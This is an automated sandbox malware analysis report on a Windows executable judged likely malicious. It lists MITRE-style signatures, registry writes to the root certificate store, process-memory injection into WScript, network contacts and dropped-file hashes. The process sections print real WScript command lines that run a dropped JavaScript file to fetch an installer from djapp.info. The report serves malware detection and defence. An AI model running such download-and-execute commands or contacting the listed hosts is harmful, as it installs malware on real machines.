Malware Analysis Report

2024-10-10 07:15

Sample ID 240613-s6lbjayglm
Target a652a09e98593e6ea054a28cbec33fb0_JaffaCakes118
SHA256 6a9cd19d6462fd3716543527db8365343fd78ee86c9068eb0acf108cc160ef94
Tags
execution
score
8/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
8/10

SHA256

6a9cd19d6462fd3716543527db8365343fd78ee86c9068eb0acf108cc160ef94

Threat Level: Likely malicious

The file a652a09e98593e6ea054a28cbec33fb0_JaffaCakes118 was found to be: Likely malicious.

Malicious Activity Summary

execution

Blocklisted process makes network request

Checks computer location settings

Unsigned PE

Command and Scripting Interpreter: JavaScript

Enumerates physical storage devices

Modifies system certificate store

Suspicious use of WriteProcessMemory

Modifies registry class

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-13 15:44

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-13 15:44

Reported

2024-06-13 15:46

Platform

win7-20231129-en

Max time kernel

120s

Max time network

128s

Command Line

"C:\Users\Admin\AppData\Local\Temp\a652a09e98593e6ea054a28cbec33fb0_JaffaCakes118.exe"

Signatures

Command and Scripting Interpreter: JavaScript

execution

Enumerates physical storage devices

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C C:\Windows\SysWOW64\WScript.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 0f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d090000000100000068000000306606082b0601050507030106082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030806082b06010505070309060a2b0601040182370a030406082b0601050507030606082b0601050507030706082b060105050802025300000001000000230000003021301f06092b06010401a032010130123010060a2b0601040182373c0101030200c00b000000010000001600000047006c006f00620061006c005300690067006e000000140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b1d00000001000000100000006ee7f3b060d10e90a31ba3471b999236030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0 C:\Windows\SysWOW64\WScript.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 190000000100000010000000a823b4a20180beb460cab955c24d7e21030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c1d00000001000000100000006ee7f3b060d10e90a31ba3471b999236140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b0b000000010000001600000047006c006f00620061006c005300690067006e0000005300000001000000230000003021301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0090000000100000068000000306606082b0601050507030106082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030806082b06010505070309060a2b0601040182370a030406082b0601050507030606082b0601050507030706082b060105050802020f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0 C:\Windows\SysWOW64\WScript.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C C:\Windows\SysWOW64\WScript.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 0400000001000000100000003e455215095192e1b75d379fb187298a0f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d090000000100000068000000306606082b0601050507030106082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030806082b06010505070309060a2b0601040182370a030406082b0601050507030606082b0601050507030706082b060105050802025300000001000000230000003021301f06092b06010401a032010130123010060a2b0601040182373c0101030200c00b000000010000001600000047006c006f00620061006c005300690067006e000000140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b1d00000001000000100000006ee7f3b060d10e90a31ba3471b999236030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c190000000100000010000000a823b4a20180beb460cab955c24d7e21200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0 C:\Windows\SysWOW64\WScript.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2856 wrote to memory of 2032 N/A C:\Users\Admin\AppData\Local\Temp\a652a09e98593e6ea054a28cbec33fb0_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 2856 wrote to memory of 2032 N/A C:\Users\Admin\AppData\Local\Temp\a652a09e98593e6ea054a28cbec33fb0_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 2856 wrote to memory of 2032 N/A C:\Users\Admin\AppData\Local\Temp\a652a09e98593e6ea054a28cbec33fb0_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 2856 wrote to memory of 2032 N/A C:\Users\Admin\AppData\Local\Temp\a652a09e98593e6ea054a28cbec33fb0_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 2856 wrote to memory of 2684 N/A C:\Users\Admin\AppData\Local\Temp\a652a09e98593e6ea054a28cbec33fb0_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 2856 wrote to memory of 2684 N/A C:\Users\Admin\AppData\Local\Temp\a652a09e98593e6ea054a28cbec33fb0_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 2856 wrote to memory of 2684 N/A C:\Users\Admin\AppData\Local\Temp\a652a09e98593e6ea054a28cbec33fb0_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 2856 wrote to memory of 2684 N/A C:\Users\Admin\AppData\Local\Temp\a652a09e98593e6ea054a28cbec33fb0_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 2856 wrote to memory of 1928 N/A C:\Users\Admin\AppData\Local\Temp\a652a09e98593e6ea054a28cbec33fb0_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 2856 wrote to memory of 1928 N/A C:\Users\Admin\AppData\Local\Temp\a652a09e98593e6ea054a28cbec33fb0_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 2856 wrote to memory of 1928 N/A C:\Users\Admin\AppData\Local\Temp\a652a09e98593e6ea054a28cbec33fb0_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 2856 wrote to memory of 1928 N/A C:\Users\Admin\AppData\Local\Temp\a652a09e98593e6ea054a28cbec33fb0_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 2856 wrote to memory of 1764 N/A C:\Users\Admin\AppData\Local\Temp\a652a09e98593e6ea054a28cbec33fb0_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 2856 wrote to memory of 1764 N/A C:\Users\Admin\AppData\Local\Temp\a652a09e98593e6ea054a28cbec33fb0_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 2856 wrote to memory of 1764 N/A C:\Users\Admin\AppData\Local\Temp\a652a09e98593e6ea054a28cbec33fb0_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 2856 wrote to memory of 1764 N/A C:\Users\Admin\AppData\Local\Temp\a652a09e98593e6ea054a28cbec33fb0_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 2856 wrote to memory of 488 N/A C:\Users\Admin\AppData\Local\Temp\a652a09e98593e6ea054a28cbec33fb0_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 2856 wrote to memory of 488 N/A C:\Users\Admin\AppData\Local\Temp\a652a09e98593e6ea054a28cbec33fb0_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 2856 wrote to memory of 488 N/A C:\Users\Admin\AppData\Local\Temp\a652a09e98593e6ea054a28cbec33fb0_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 2856 wrote to memory of 488 N/A C:\Users\Admin\AppData\Local\Temp\a652a09e98593e6ea054a28cbec33fb0_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe

Processes

C:\Users\Admin\AppData\Local\Temp\a652a09e98593e6ea054a28cbec33fb0_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\a652a09e98593e6ea054a28cbec33fb0_JaffaCakes118.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf143C.js" http://www.djapp.info/?domain=hQPhLNxfYn.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf143C.exe

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf143C.js" http://www.djapp.info/?domain=hQPhLNxfYn.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf143C.exe

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf143C.js" http://www.djapp.info/?domain=hQPhLNxfYn.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf143C.exe

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf143C.js" http://www.djapp.info/?domain=hQPhLNxfYn.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf143C.exe

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf143C.js" http://www.djapp.info/?domain=hQPhLNxfYn.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf143C.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 www.djapp.info udp
US 8.8.8.8:53 bi.downthat.com udp
US 3.19.116.195:80 bi.downthat.com tcp
US 8.8.8.8:53 www.hugedomains.com udp
US 172.67.70.191:443 www.hugedomains.com tcp
US 8.8.8.8:53 pki.goog udp
US 216.239.32.29:80 pki.goog tcp
US 8.8.8.8:53 www.microsoft.com udp
US 3.19.116.195:80 bi.downthat.com tcp
US 172.67.70.191:443 www.hugedomains.com tcp
US 8.8.8.8:53 bi.downthat.com udp
US 18.119.154.66:80 bi.downthat.com tcp
US 172.67.70.191:443 www.hugedomains.com tcp
US 18.119.154.66:80 bi.downthat.com tcp
US 172.67.70.191:443 www.hugedomains.com tcp
US 18.119.154.66:80 bi.downthat.com tcp
US 172.67.70.191:443 www.hugedomains.com tcp

Files

C:\Users\Admin\AppData\Local\Temp\fuf143C.js

MD5 3813cab188d1de6f92f8b82c2059991b
SHA1 4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb
SHA256 a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e
SHA512 83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\HXCD4I85\domain_profile[1].htm

MD5 f322673fd5cbe9d3f5ddbecb281ff8c3
SHA1 11b08663c1310e97b60fa4ababaac33377cf8cfe
SHA256 3331db507ad03cb8d608ca304a6b6de793d803fbd24ed83999e5ce90b76409cf
SHA512 e98c790c317589e79033ca5e7fd850f1ce602b05c20a922685bf730578130813b07eed04c95760d0277dfd53f7e5c699104039d905cc1aac79c1a1a3c489e7e1

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\56O2B4T6.txt

MD5 521ff7fa501580f5c7503261fcdcb76a
SHA1 89fb0f3cb693c136d7685e4f0199704debe8aa27
SHA256 02de0cbae2ba931ef16218d4dbb3dfd8b0bbf0be6543047a29dd462013defc79
SHA512 5850f25c0a906079e4db7e41c3019340ead6cf0f39504e5a9e5a702483e8e451bc8cb5b9778e66712d093a75da7cdc2cd65324ff69e3c2129a62949635ec98c4

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

MD5 f8aa1a291d20db704aff8dcc99c0782f
SHA1 52ce8f8661c98ed78ce5e778da3ee0a6063eee0d
SHA256 67e07cd7b225a0c1e39e6977f6c9605db430dc8bc953f619b8e6576c0bbc7d0e
SHA512 ad9c5756b501c2ab332eed9f82a3d8ab1efa36c1163bf875a249071ebc3ca12866c470396b42510f73a86117d56e074bdb4e82e55d8ce14f7028168a5a350cc1

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

MD5 3d0ece762b3cbb49d3c5c972b3a09a37
SHA1 73847adbffd52f3fc0745de4395268d656023cfa
SHA256 e3cb8ee67bedb166281cea7b9a2b3dc1f1a76165b92f19ed8c73fe49485e1877
SHA512 f854ae4f95460b42de3bba20628b41aef63bcd8d2c7e9f3d749658bb364929ac24c325490812955f3d3d83a7eed43586f678b8dcbab9c0be2d2dc354e9bf76c7

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

MD5 8202a1cd02e7d69597995cabbe881a12
SHA1 8858d9d934b7aa9330ee73de6c476acf19929ff6
SHA256 58f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5
SHA512 97ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 9fd12e7c88822109ca9d393703976240
SHA1 8d4b3867029977ee05c62db281b17ce95a3d09c3
SHA256 1b5272b12fd042a6eaf21c44b7c7687f3a7d4b738751bd5bb1fc8d817d714a0e
SHA512 11b0fd218b677165aa40acafb6a5500c440ab3036f97bb70a53a0da52f32c7edc1585a76e234c5bd02432921537963d2f69c302d10f0b6856e3241cafe8c704d

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

MD5 4918c5a2d8e688234fced94d1d1cd531
SHA1 b4ee573c28a3862dd47390d7ca976df8a50e28e5
SHA256 aced6f4c8bcc408fa15ebc19f62a50b308d6f4abc8e2b35ba460c6d0f5882e27
SHA512 c7ad23310e2ce8c003ac751ccb8008099a3e9ff1319ff8bb63637243cfcbe2bc3c6d1fc2c9d4f0723090b8660c058e9269cb98d2d1a6264bc08dce1c8ad626a3

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357

MD5 a266bb7dcc38a562631361bbf61dd11b
SHA1 3b1efd3a66ea28b16697394703a72ca340a05bd5
SHA256 df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e
SHA512 0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357

MD5 619073583c805bb48bfcb0b19388d373
SHA1 60f3675ea0b818bf30afa0926e83aceaafe31716
SHA256 cc362847041a170411418419d7afbf9196c677eb0f2a6856b42a6f98b0f4ba8d
SHA512 0cc3ff3b0b57859255b5df5f1f9f08b1597aabcaaddee2fddca262b4f54a81b87162675a4906b1aa0df0dd85846d34786783f663a100cca84735f9b6a870f4b0

C:\Users\Admin\AppData\Local\Temp\Tar5C35.tmp

MD5 4ea6026cf93ec6338144661bf1202cd1
SHA1 a1dec9044f750ad887935a01430bf49322fbdcb7
SHA256 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA512 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ETUT5CMR\domain_profile[1].htm

MD5 fc20af50443c71b4c696d726253d52e6
SHA1 5e77a9412417c819b9f521c66c107c68a0cf98f7
SHA256 b90dc42e20be3dc6f1e2813b0aaf81d4510b433cf4f70a7696538741dd931538
SHA512 503e7fd43a6449128dc004a7a0479fcb398883cd5d8c39f22c7b7828432ee916f7a24474428514bc099de8b9fcdd77408f1697634862c5c5ae40a86eebe20218

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\HXCD4I85\domain_profile[1].htm

MD5 2a8ea6aa9e904370f4f6e0c53b878e97
SHA1 db546660c61de56e3ec5876ada59d583dafa082b
SHA256 7f91bfda442d910f504bc7ce9b8510acca0c87e1adcb4723ea09dfb9c0ff6e9f
SHA512 c5f8c87a02a8c070a89141b3f3cbe0b17fee3d81b816e2285d6a6b96f998d31588d8133afb73fd3098fec7b5515511a94016513262d7f3e5f939d81d7b67f294

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ETUT5CMR\domain_profile[1].htm

MD5 c9bf8b8bb75fe723867c0e5138b8830f
SHA1 b70c842600a25ad3c55c011c592572d03ac77377
SHA256 e00d8bcd7c432dc69fb9a1d6ce5894cfde8612686a3a041e24dafab097cac8c2
SHA512 29fc67115e3fd4ed20dcbd9890ce73ce19f2f291572502274ea4ea339992586c3e0b4d4e9bf2de53c607aca6abaf09e583bd41590675ab3a0981f265895fad13

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-13 15:44

Reported

2024-06-13 15:46

Platform

win10v2004-20240611-en

Max time kernel

124s

Max time network

128s

Command Line

"C:\Users\Admin\AppData\Local\Temp\a652a09e98593e6ea054a28cbec33fb0_JaffaCakes118.exe"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WScript.exe N/A
N/A N/A C:\Windows\SysWOW64\WScript.exe N/A
N/A N/A C:\Windows\SysWOW64\WScript.exe N/A
N/A N/A C:\Windows\SysWOW64\WScript.exe N/A
N/A N/A C:\Windows\SysWOW64\WScript.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\a652a09e98593e6ea054a28cbec33fb0_JaffaCakes118.exe N/A

Command and Scripting Interpreter: JavaScript

execution

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\a652a09e98593e6ea054a28cbec33fb0_JaffaCakes118.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 5044 wrote to memory of 3496 N/A C:\Users\Admin\AppData\Local\Temp\a652a09e98593e6ea054a28cbec33fb0_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 5044 wrote to memory of 3496 N/A C:\Users\Admin\AppData\Local\Temp\a652a09e98593e6ea054a28cbec33fb0_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 5044 wrote to memory of 3496 N/A C:\Users\Admin\AppData\Local\Temp\a652a09e98593e6ea054a28cbec33fb0_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 5044 wrote to memory of 5016 N/A C:\Users\Admin\AppData\Local\Temp\a652a09e98593e6ea054a28cbec33fb0_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 5044 wrote to memory of 5016 N/A C:\Users\Admin\AppData\Local\Temp\a652a09e98593e6ea054a28cbec33fb0_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 5044 wrote to memory of 5016 N/A C:\Users\Admin\AppData\Local\Temp\a652a09e98593e6ea054a28cbec33fb0_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 5044 wrote to memory of 4008 N/A C:\Users\Admin\AppData\Local\Temp\a652a09e98593e6ea054a28cbec33fb0_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 5044 wrote to memory of 4008 N/A C:\Users\Admin\AppData\Local\Temp\a652a09e98593e6ea054a28cbec33fb0_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 5044 wrote to memory of 4008 N/A C:\Users\Admin\AppData\Local\Temp\a652a09e98593e6ea054a28cbec33fb0_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 5044 wrote to memory of 2120 N/A C:\Users\Admin\AppData\Local\Temp\a652a09e98593e6ea054a28cbec33fb0_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 5044 wrote to memory of 2120 N/A C:\Users\Admin\AppData\Local\Temp\a652a09e98593e6ea054a28cbec33fb0_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 5044 wrote to memory of 2120 N/A C:\Users\Admin\AppData\Local\Temp\a652a09e98593e6ea054a28cbec33fb0_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 5044 wrote to memory of 4120 N/A C:\Users\Admin\AppData\Local\Temp\a652a09e98593e6ea054a28cbec33fb0_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 5044 wrote to memory of 4120 N/A C:\Users\Admin\AppData\Local\Temp\a652a09e98593e6ea054a28cbec33fb0_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 5044 wrote to memory of 4120 N/A C:\Users\Admin\AppData\Local\Temp\a652a09e98593e6ea054a28cbec33fb0_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe

Processes

C:\Users\Admin\AppData\Local\Temp\a652a09e98593e6ea054a28cbec33fb0_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\a652a09e98593e6ea054a28cbec33fb0_JaffaCakes118.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufF50E.js" http://www.djapp.info/?domain=hQPhLNxfYn.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fufF50E.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

